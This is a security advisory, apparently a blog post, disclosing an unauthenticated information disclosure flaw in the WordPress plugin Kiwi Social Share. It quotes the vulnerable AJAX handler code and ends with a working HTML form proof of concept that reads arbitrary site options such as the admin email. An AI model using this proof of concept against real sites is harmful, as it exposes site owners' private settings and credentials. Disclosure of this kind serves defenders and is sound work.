Full Disclosure of Information Disclosure Vulnerability in Kiwi Social Share
While looking an option update vulnerability in the plugin Kiwi Social Share we noticed that right above the code for that vulnerability was code that causes another vulnerability. That being an information disclosure vulnerability that allows anyone to view the contents of any WordPress option (setting).
In the file /includes/lib/helpers/class-kiwi-social-share-helper.php the function kiwi_social_share_get_option() is made available through WordPress AJAX functionality whether the request is coming from someone logged in to WordPress or not:
418 419 | add_action( 'wp_ajax_kiwi_social_share_get_option', 'kiwi_social_share_get_option' ); add_action( 'wp_ajax_nopriv_kiwi_social_share_get_option', 'kiwi_social_share_get_option' ); |
That function will pass user input to the function get_setting_value() and output the result:
426 427 428 | function kiwi_social_share_get_option() { if ( ! empty( $_POST ) && $_POST['action'] === 'kiwi_social_share_get_option' ) { wp_die( json_encode( Kiwi_Social_Share_Helper::get_setting_value( $_POST['args']['option'], $_POST['args']['default'], $_POST['args']['group'] ) ) ); |
That function in turn will get the value of an option specified by the user input and return it to be output in the other function:
302 303 304 305 306 307 308 309 310 | public static function get_setting_value( $option = '', $default = '', $group = '' ) { if ( empty( $group ) ) { $group = 'kiwi_general_settings'; } $options = get_option( $group, array() ); if ( empty( $option ) ) { return $options; |
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon).
Proof of Concept
The following proof of concept will display the Admin Email Address set for the website.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="kiwi_social_share_get_option" /> <input type="hidden" name="args[group]" value="admin_email" /> <input type="submit" value="Submit" /> </form> </body> </html>
Pingback: Podcast de Seguridad WordPress: WPZ 109 | World of WordPress